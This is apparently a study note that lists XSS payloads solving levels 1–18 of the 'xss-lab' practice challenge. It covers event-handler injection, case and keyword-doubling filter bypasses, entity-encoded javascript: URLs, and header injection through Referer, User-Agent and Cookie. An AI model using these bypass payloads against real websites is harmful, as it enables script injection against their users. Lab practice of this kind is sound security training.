xss-lab levels 1-18 payloads

Less-1

?name=<script>alert()</script>

Less-2

"><script>alert()</script>

"onclick="alert()

" onfocus="alert()

" onblur="alert()

Less-3

' onfocus='alert()

' onblur='alert()

' onfocus='javascript:alert()'

' onblur='javascript:alert()

' onclick='alert()

Less-4

" onfocus="alert()

" onfocus="javascript:alert()

" onblur="alert()

" onblur="javascript:alert()

" onclick="alert()

" onclick="javascript:alert()

Less-5

"><a href="javascript:alert();">cooper</a>

Less-6

" Onclick="alert()

" Onfocus="alert()

" Onblur = "alert()

"><a Href="javascript:alert()">cooper</a>

"><Script>alert()</Script>

Less-7

" oonnfocus="alert()

"oonnclick="alert()

" oonnfocus="alert()

"><a hhrefref="javasscriptcript:alert()">cooper</a>

"><sscriptcript>alert()</sscriptcript>

"><img ssrcrc=666 oonnerror=alert()>

"><img srsrcc=666 oonnmouseout=alert()>

"><img srsrcc=666 oonnmouseover=alert()>

Less-8

javascript:alert() (Unicode-encoded, written as HTML numeric character references)

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;

Less-9

javascript:alert(), encoded, with http:// appended after it; comment the http:// out with // or /**/

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;//http://

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;/*http://*/

Less-10

?t_sort=" onfocus=javascript:alert(); type="text (type makes the input box appear)

?t_sort=" onclick=javascript:alert(); type="

?t_sort=" onblur=javascript:alert(); type="

?keyword=well done!&t_lick=aa&t_history=aa&t_sort=aa (check which parameter can be assigned a value)

?keyword=well done!&t_lick=aa&t_history=aa&t_sort='" type='text' onclick='alert(123)'

?keyword=well done!&t_lick=aa&t_history=aa&t_sort='" type='text' onblur='javascript:alert()'

?keyword=well done!&t_lick=aa&t_history=aa&t_sort='" type='text' onfocus='alert(123)'

Less-11

Capture the request with Burp Suite.

Change the Referer header to the Less-10 payload, then forward the request.

Referer:" onfocus=javascript:alert(); type="text

Less-12

Capture the request with Burp Suite.

Change the User-Agent header to the Less-10 payload, then forward the request.

User-Agent: " onfocus=javascript:alert(); type="text

Less-13

Capture the request with Burp Suite.

Change the Cookie header to the Less-10 payload, then forward the request.

Cookie: user=" onfocus=javascript:alert() type="text

Less-14

The page no longer works. The approach is to upload an image whose properties contain JS code; see the blog for details.

Less-15

http://192.168.31.110/xss/level15.php?src=' http://192.168.31.110/xss/level1.php?name="><a href="javascript:alert( )">cooper</a>'

Less-16

http://192.168.31.110/xss/level16.php?keyword=<a href='javasc ript:alert()'>cooper

Less-17

http://192.168.31.110/xss/level17.php?arg01=a\&arg02=b onmouseover=javascript:alert()

http://192.168.31.110/xss/level17.php?arg01=a\&arg02=b onmouseout=javascript:alert()

(Open it in Edge; Firefox shows no popup.)

Less-18

http://192.168.31.110/xss/level18.php?arg01=a\&arg02=b onmouseover=alert()

http://192.168.31.110/xss/level18.php?arg01=a\&arg02=b onmouseout=alert()

http://192.168.31.110/xss/level18.php?arg01=a\&arg02=b onmouseleave=alert()

http://192.168.31.110/xss/level18.php?arg01=a\&arg02=b onmouseenter=alert()

http://192.168.31.110/xss/level18.php?arg01=a\&arg02=b onmousedown=alert() (triggered on click)

onmouseover, onmouseout: the event fires when the mouse moves onto the element itself, and it also fires when the mouse moves onto one of its child elements.

onmouseenter, onmouseleave: the event fires when the mouse moves onto the element itself, but it does not fire when the mouse moves onto one of its child elements.
